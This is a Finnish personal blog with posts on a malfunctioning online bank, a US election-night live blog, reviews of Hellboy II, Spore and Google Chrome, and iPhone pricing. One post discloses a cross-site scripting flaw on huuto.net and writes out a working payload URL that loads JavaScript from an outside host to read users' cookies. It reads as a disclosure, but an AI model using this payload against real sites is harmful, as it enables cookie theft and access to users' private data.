Nordean verkkopankkia äsken käytellessäni huomasin että se on todella huonossa jamassa. Sivut latautuvat madelle ja useat toiminnot palauttavat vain mitäänasnomattomia virheitä (tilapäinen häiriö, yritä myöhemmin uudelleen). En kovin hyvillä mielin lähtenyt virtuaalipankista, kun tilitapahtumista tuntui puuttuvan muutaman päivän seikkailut kokonaan ja heti viimeisen maksun maksettuani pankki ei enää ladannut sivuja lainkaan. Nyt jännitetään tuleeko velkojilta postia pankin sekoilun takia.
Suositulla huuto.net-nettihuutokauppasivustolla on ainakin yksi vakavanlaatuinen cross-site scripting -haavoittuvuus, jota hyväksikäyttämällä vihamielinen käyttäjä voi – huijaamalla käyttäjän klikkaamaan muodostamaansa linkkiä – varastaa sivun käyttäjien evästeitä.
Suoranaista välitöntä vaaraa haavoittuvuudesta ei ole, koska Huuto.net fiksusti vaatii tarjouksia tehdessä ja käyttäjän tietoja muokatessa aina salasanan, mutta esimerkiksi käyttäjän osoite- ja muiden muuten salaisten yhteystietojen selaus onnistuu käyttäjän salasanaa tuntematta
Haavoittuvuus on tiedostossa /fi/showfeedback.php3, joka listaa pyydetyn käyttäjän saaman huutokauppapalautteen. Haluttu käyttäjä lähetetään skriptille GET muuttujassa fbuser. Muuttujalle ei ilmeisesti tehdä minkäänlaista suodatusta, lukuunottamatta (oman veikkaukseni mukaan automaattista) PHP:n addslashes:ia. Käytännössä addslashes estää lainausmerkkien käyttämisen XSS-urlissa, mutta tämä ei muodosta kovinkaan suurta ongelmaa, koska hyökkääjän täytyy ainoastaan saada sivu linkkaamaan ulkoiseen javascript-tiedostoon.
Käytännössä tämä onnistuu käyttämällä osin rikkinäistä HTML:ää, ja asettamalla fbuser-muuttujana vaikkapa ‘<script src=http://domain.com/script.js></script>’. Tämä on kuitenkin tarpeettoman pitkä tapa, ja optimointiin on vielä varaa. Ensinnäkin, script-tagin sulkutag on täysin turha, samoin kuin itse tagin lopettava suurempikuin-merkki. Suurimassa osassa moderneista selaimista, selain käsittelee Quirks Modessa ‘<script src=osoite’-muotoisen script-tagin onnistuneesti.
Nyt XSS on siis muotoa ‘fbuser=<script src=http://domain.com/script.js’. protokolla-merkinnästä voidaan tuoreilla selaimilla jättää itse protokollan nimi ja kaksoispiste pois, ja tagi toimii edelleen normaalisti (Quirks Modessa).
Nyt siis URL on muotoa ‘huuto.net/fi/showfeedback.php3?fbuser=<script src=//domain.com/script.js’.
Proof-of-concept löytyy osoitteesta http://xi7.org/t.js. Käytännössä koodia käytettäisiin seuraavasti: http://www.huuto.net/fi/showfeedback.php3?fbuser=%3Cscript%20src=//xi7.org/t.js. Koodi ei varasta käyttäjien evästeitä, ainoastaan tulostaa ne, ja lyhyen selostuksen haavoittuvuudesta.
3:08. Valitsijaäänet MSNBC:n mukaan 103-34.
Tähän asti homma on edennyt juuri niin kuin kaikki odottivatkin, ja kaikki osavaltiot ovat menneet “omille” puolueilleen, jännitetään miten tilanne etenee…
3:18 ennusteet ovat jakaneet tähänastiset senaattipaikat 44-29 demokraateille. Jännittävä tilanne syntyy, jos Obama voittaa presidenttikilvan ja demokraatit saavat senaatissa enemmistön.
3:24 Palm Beachissa, Floridassa on yllättäen taas ongelmia äänestämisen, äänien keräämisen ja äänien laskemisen kanssa.. Yllättyneitä olivat mm.:
3:31 Arkansas sulki juuri äänestyspisteensä. Ellei tapahdu jotain aivan järkyttävää, McCain vie valitsijaäänet heittämällä. Seuraava sulkemisrypäs on puolen tunnin kuluttua. Senaattitilanne-ennuste on 46-30.
3:33 Alabama exit pollien mukaan McCainille, eli valitsijaennuste 103 – 43.
3:36 Georgia ennustettu McCainille, tilanne 103 – 58.
3:53 edustajainhuoneen puoluejakaumaennuste on tällä hetkellä 261 – 174. Jos kaikki tähänastiset ennusteet pitävät kutinsa, olisi demokraateilla enemmistö senaatissa ja edustajainhuoneella sekä presidentti puolellaan. Erittäin kiinnostava ajatusleikki :P
4:00 Arizona, Colorado, Louisiana, Minnesota, New Mexico, New York, Rhode Island, Wisconsin ja Wyoming sulkivat juuri vaalitoimistonsa. Ennusteissa Kansas, North Dakota ja Wyoming McCainille. New York, Wisconsin, Minnesota Obamalle. 175 – 70.
4:06 MSNBC korjaili edustajanhuone-ennustettaan 260 – 175:n
4:09 Arkansas McCainille. 175 – 76.
4:21 Noin 50 minuutin kuluttua Comedy Centralin vaalispesiaali alkaa. Tuolloin ottanen noin tunnin tauon bloggaamisesta ja jatkan kuuden aikoihin.
4:22 Ohio Obamalle. Ensimmäinen “punainen” osavaltio, jonka demokraattien presidenttiehdokas käänsi puolelleen. 195 – 76. Ainutkaan rebuplikaani ei ole voittanut presidentinvaaleja ja hävinny Ohiota samoissa vaaleissa.
4:26 Loussiana McCainille. 195 – 85.
4:31 New Mexico Obamalle. Jo toinen punaosavaltio demokraateille. 200 – 85. Muistutan, että kaikki luvut ovat tällä hetkellä ennusteita, vaikkakin erittäin kokeneilta ennustajilta.
4:34 hermostuttaa kuunnella tv-juontajien amerikkalaiset vs. poliitikot vastakkainasettelua. Luulisi amerikkalaisten itse ymmärtävän, että vaaleissa äänestetään amerikkalaisia poliitikkoja…
4:37 demokraatit ryöstävät senaatista taas yhden paikan. Jakauma nyt 50 – 36. Etelä-Virginia McCainille, tilanne 200 – 90.
4:55 Viisi minuuttia the Daily Shown ja Colbert Reportin yhteislähetykseen. Texas McCainille, 200 – 124.
4:58 CBS nimesi jo Obaman voittajaksi :D
5:01 INDECISION 2008!!!
5:06 207 – 129. New York, New Jersay ja Pensylvania Obamalle. Etelä-Carolina McCainille. Senaatti 52 – 38.
5:09 Missisipi McCainille. 207 – 135.
5:11 New Hampshire ja Conneticut Obamalle, Kentucky McCainille.
5:22 Iowa ja Vermont Obamalle.
5:32 Illinois yllättäen Obamalle
5:38 Etelä-Dakota McCainille, 207 – 138
5:41 Nebraska McCainille, 207 – 143
5:59 VIRGINIA OBAMALLE! Ensimmäistä kertaa vuosiin Virginia on valinnut demokraatin.
6:01 MSNBC ON ENNUSTANUT AMERIKAN 44. PRESIDENTIKSI BARACK OBAMAN!!!
toistan:
OBAMA VOITTI!
Enää kaksi ja puoli kuukautta ennenkuin presidentti George W. Bush siirtyy syrjään ja USA:n ensimmäinen tummaihoinen presidentti Barack Obama astuu virkaansa.
Niille, jotka ovat seuranneet WindowsMobile-laitteiden selaintilannetta viimeisen kuuden kuukauden aikana on SkyFire varmasti tuttu nimi. Eilen Skyfire Labs virallisesti lopetti suljetun betavaiheen ja avasi betan kaiken kansan kokeiltavaksi.
Ohjelman lataaminen ja käyttäminen vaatii edelleen virallisesti yhdysvaltalaisen kännykkänumeron, mutta ainakin tällä hetkellä rajoituksen ohittaminen on äärettömän helppoa
Käytiin tiistaina katsomassa tuo “uusi” Hellboy II: The Golden Army-elokuva. Hupia oli.
Elokuvassa nähtiin lisää sarjakuvista tuoreita hahmoja, kiinnostavimpana varmasti Johann Kraus (elokuvassa Krauss), jonka äänenä
Seth MacFarlane oli erittäin hyvä. Hahmo sinänsä eroaa melko rajusti sarjakuvista tutusta Krausista. Kun Krausin ektoplasminen keho on sarjakuvassa jatkuvassa riivaamisen vaarassa, voi elokuvan Krauss itse vallata elottomia esineitä ja olentoja.
Uusien hahmojen lisäksi elokuva esittelee Hellboylle uuden aseen; Big Babyksi nimetty kranaatinheitintä muistuttava tykki esiintyy elokuvassa vain kerran, mutta antaa silti vaikuttavasti kyytiä isohkolle puolijumalalle.
Myös Lizin ja Hellboyn suhdedraama (joka on täysin sarjakuvasta irtonainen juonikuvio) etenee ja iso osa elokuvasta pyörii tavalla tai toisella pariskunnan tulevaisuuden ympärillä.
Hellboy 2 on liian vaisu ja (ainakin Suomessa) liian myöhään julkaistu ollakseen kesän toimintapläjäys, ja on melko erilainen kuin edeltäjänsä. Samoin kuin ykkösosa, on elokuva reilu parituntinen, mutta kerronnallisesti jatko-osa tuntuu olevan suunnattu ensimmäistä elokuvaa nuoremmalle kohdeyleisölle.
Elokuva on myös hieman “kasaanliimatun” oloinen; osa kohtauksista tuntuu irtonaisilta ja hätäisesti mukaan poimituilta. Valitettavasti yksi koko pätkän onnistuneimmista kohtauksista on juuri tällainen täyteosuus, joka elokuvan loputtua jäi mieleen pyörimään oudon irtonaisena ja selvittämättömänä konfliktina.
Näistä pikkuvirheistä huolimatta Hellboy II: The Golden Army on viihdyttävä ja paikoittain erittäinkin hauska elokuva mystisistä voimista ja maagisista olennoista, ja jos ei takerru liikaa hieman takkuavaan kerrontaan ja ajoittain hieman hektisesti kuvattuihin toimintaosuuksiin, on leffa oikein hyvä tapa kuluttaa kaksi tuntia luppoaikaa.
Ostahdin eilen Annukalle Will Wrightin uutukaisen Sporen jota rouva tuossa tälläkin hetkellä tahkoaa innoissaan. Huolimatta Wrightin aikaisemmasta hittiputkesta, olin melko skeptinen Sporen suhteen, lähinnä siksi, että olen odottanut innolla pelin julkaisua kolmisen vuotta, jona aikana hypen määrä on kasvanut melkeinpä eksponentiaalisesti.
Spore on kuitenkin ainakin tähän asti lunastanut kaikki odotukset. Hahmojen luominen ja muokkaaminen on helppoa ja hauskaa, itse peli on kaunis ja helposti opittava. Brian Enon musiikit kuulostavat äärimmäisen hyvältä ja muutenkin pelin äänimaailma on viimeistelty ja miellyttävä.
En tarkoituksella itse koskenut peliin lainkaan, vaan tarkkaillut vierestä vaimon pelailua. Annukka ei ole kovin hardcore-pelaaja, vaan on keskittynyt aina hieman erilaisiin peleihin. Aikaisempia suosikkeja ovat mm. erilaiset karaoke- ja musiikkipelit, Animal Crossing, Innocent Life ja Drawn to Life.
Sporesta on tehty niin intuitiivinen ja ohjastava, että vaikka peli kuulema onkin haastava, ei sen pelaaminen ole vaikeaa. Tämä on valtava kompastuskivi niin monessa muuten hyvässä pelissä; pelintekijät yrittävät usein saada peliin lisää vaikeustasoa tekemällä pelin pelaamisesta vaikeaa, joka taas vähentää roimasti pelin viihdearvoa. Hienoa nähdä että Maxis on onnistunut välttämään tämän kaltaiset ongelmat.
Pitää itse vielä pelitestata Spore, mutta ainakin näin olanyli tarkasteltuna, peli vaikuttaa erittäin hauskalta, monipuoliselta ja ennenkaikkea tuoreelta. Kirjoittelen laajemmalti omista pelikokemuksistani jahka ehdin peliä omin käsin testata.
Google Chrome julkaistiin tänään. Kyseessä on Googlen kehittämä webbiselain, joka käyttää Applen WebKit-moottoria sivujen muodostamiseen. Olen nyt jonkin aikaa selaimen kanssa puuhaillut, ja ajattelin kirjoitella hieman ensivaikutelmia
Selain todella on nopea. Välilehdet aukeavat erittäin sutjakkaasti ja itse selainkin käynnistyy todella vauhdikkaasti. Toisaalta vertailukohta on huono, koska omassa Firefoxissani on melkoinen liuta laajennuksia, joten sen käynnistymisajat eivät varmasti ole optimaalit.
Toinen asia joka Chromessa heti pistää silmään on käyttöliittymän koruton siisteys. Selaimessa ei ole lainkaan perinteistä tekstivalikkoa, vaan ainoat kaksi valikkoa löytyvät painikkeista “osoite”kentänt oikealta puolelta. Tämä tuleekin olemaan asia josta vannoutuneet IE, Opera ja Safari-fanipojat varmasti tulevat kitisemään.. Omaan makuun systeemi sopii oikein hyvin. Kiitettävästi ei ole tarvinnut valikkoja juurikaan rassata; pikanäppäimet ovat vanhat tutut, ja muun käyttöliittymän kuvakieli on selkeää ja loogista.
Mainitsinkin jo “osoite”kentän. Kyseessä on Firefox 3:stakin tuttu “awesomebar”, PCP-höyryissä. Kun palkkiin alkaa näppäimistöllä jotain naputtelemaan, pomppaa listan alkuun ehdotuksiksi kirjanmerkkien ja sivuhistorian sivujen lisäksi googlen I’m feeling lucky-vastaus ja linkki oletushakukoneen hakutuloksiin kirjoitetusta tekstistä.
Hyvä kun oletushakukone tuli puheeksi. Yllättäen tehdasasetuksena hakukone on Google, mutta Chrome tarjoutuu heti ensimmäiseksi asennuksen jälkeen vaihtamaan käyttäjän suosikkihakukoneen selaimen-käyttöön. Melkein saman tekee toki IE:kin, mutta Google on pitänyt huolta siitä, ettei selain liiaksi turputa julkaisijansa hakukonetta
Selaimeen on luonnollisesti sisäänrakennettu Googlen Gears, ja nopeiden testien perusteella Wordpressissä ja Remember The Milkissä, selain äityy vielä entistä “vastaavammaksi” (mikä on oikea käännös lontoon “responsiveness”-sanalle?), tai siis.. parantaa vasteaikojaan :D
Myös konepellin alla on mukavia ominaisuuksia:
- WebKit sivunmuodostusmoottori. Selain läpäisee ACID2-testin täydellisesti ja on äärimmäisen nopea piirtämään sivuja
- Tabikohtaiset prosessit. Jokainen välilehti suoritetaan omassa prosessissaan, joten jos sattuu eksymään ikävälle hyökkäyssivulle, tai JavaScript-ohjelmaa testatessa tekee hieman isomman mokan, ei koko selain (teoriassa) kuopsahda nurin, ainoastaan kyseinen välilehti. Järjestelmä toimi omissa testauksissa, mutta vaikea tietysti näin lyhyellä käytöllä sanoa mitään varmaa
- Incognito-tila. Suoraan ohjelman tiedosto-valikosta löytyy toiminto joka avaa uuden, selkeästi merkityn, ikkunan ns. Incognito-tilasssa, jossa selain ei tallenna mitään tietoa selailusta tietokoneelle. Sivuhistoria, syötetyt lomaketiedot ja salasanat poistetaan kun ikkuna suljetaan. Tämä on erittäin kätevää, koska näin ei tarvitse poistaa hyödyllisä tallennettuja lomaketietoja, vain koska tahtoo piilottaa selaimen hakuhistoriasta vaimon lahjayllätyksen :D
- Googlen mukaan, selain sisältää aivan uusia JavaScript-systeemejä, jotka tulevaisuudessa voivat avata aivan uusia mahdollisuuksia verkkoohjelmistokehittäjille. Vaikka tämä onkin itselleni koko selaimen kiinnostavin ominaisuus (en voi ainakaan vielä ottaa Chromea oletusselaimekseni, siitä myöhemmin), mutten ole ehtinyt asiaan vielä tarkemmin perehtyä. Saatan kirjoitella aiheesta lisää jos näin teen.
Kaikenkaikkiaan selain on ensimmäiseksi julkiseksi versioksi ERINOMAINEN, ja odotan innolla mitä tulevaisuus tuo Chromelle. En kuitenkaan ainakaan vielä voisi siirtyä Firefoxista Chromeen, vaikka Googlen selain erittäin siististi kopioikin kaiken tarvittavan ongelmitta sisäänsä (tallennetut salasanat, kirjanmerkit ym.). Käytän melko suurta määrää laajennuksia Firefoxissa, ja vaikka voisinkin ns. “hätätilanteessa” elää ilman niitä, jos saan valita: en tahdo.
Googlella on kuitenkin suuria suunnitelmia Chromen suhteen, ja jos siihenkin saadaan joustava laajennustuki, voisin hyvinkin vaihtaa uuteen selaimeen.
Suosittelen kaikkia Windows-käyttäjiä ainakin kokeilemaan Chromea. Selain on hurjan vauhdikas, helppokäyttöinen ja selkeä, ja jos siirtyy esimerkiksi IE:n puolelta, ei pienen totuttelun jälkeen jää varmasti kaipaamaan mitään. Firefoxin ja Operan käyttäjät huomaavat varmasti puuttuvia ominaisuuksia, mutta haluan uskoa että tähänkin on tulossa vielä parannusta. Katsotaan mitä Google saa aikaiseksi selainmarkkinoilla. Kovin huonosti se ei ole oikein millään alalla vielä pärjännyt :P
Sonera julkisti hetki sitten uuden iPhone 3G:n hinnaston kytkyliittymänsä kanssa. Hinnasto, ja muut tiedot Soneran diilistä löytyvät heidän iPhone tuotesivuiltaan
Hinta on edullisimmillaan 31,69 euroa kuukaudessa jonka lisäksi puhelimesta on maksettava joko 159 euron (8 gigatavun versiosta) tai 245 (16 gigatavun versiosta) euron käsiraha. Lisäksi puhelimen voi maksaa kerralla, jos se tilataan Minun Sonera -liittymäpakettiin, jolloin hinta on 429 euroa tai 519 euroa.
Sitova sopimuskausi on kaikissa tapauksissa kaksi vuotta.
Oma kantani iPhonesta on melko neutraali. Minulla ei ole mitään sitä vastaan, mutten pidä sen ominaisuuksia läheskään niin mullistavina, kuin hype antaa ymmärtää. Paljon iPhonea, ja sen hintojen julkaisua enemmän odotan Verkkokaupan ilmoitusta HTC:n Touch Pro-puhelimen hinnasta.
Harvat muistavat, että HTC toi ensimmäisenä markkinoille ainoastaan kosketusnäytöllä hallittavan matkapuhelimen, kun se julkaisi ensimmäisen version HTC Touchista 24 päivää ennen Applen ensimmäistä iPhone julkaisua…
Juhannuksen juhliminen sujuu sisällä sadetta kuunnellessa.. Hyvää Jussia kaikille!
(0)
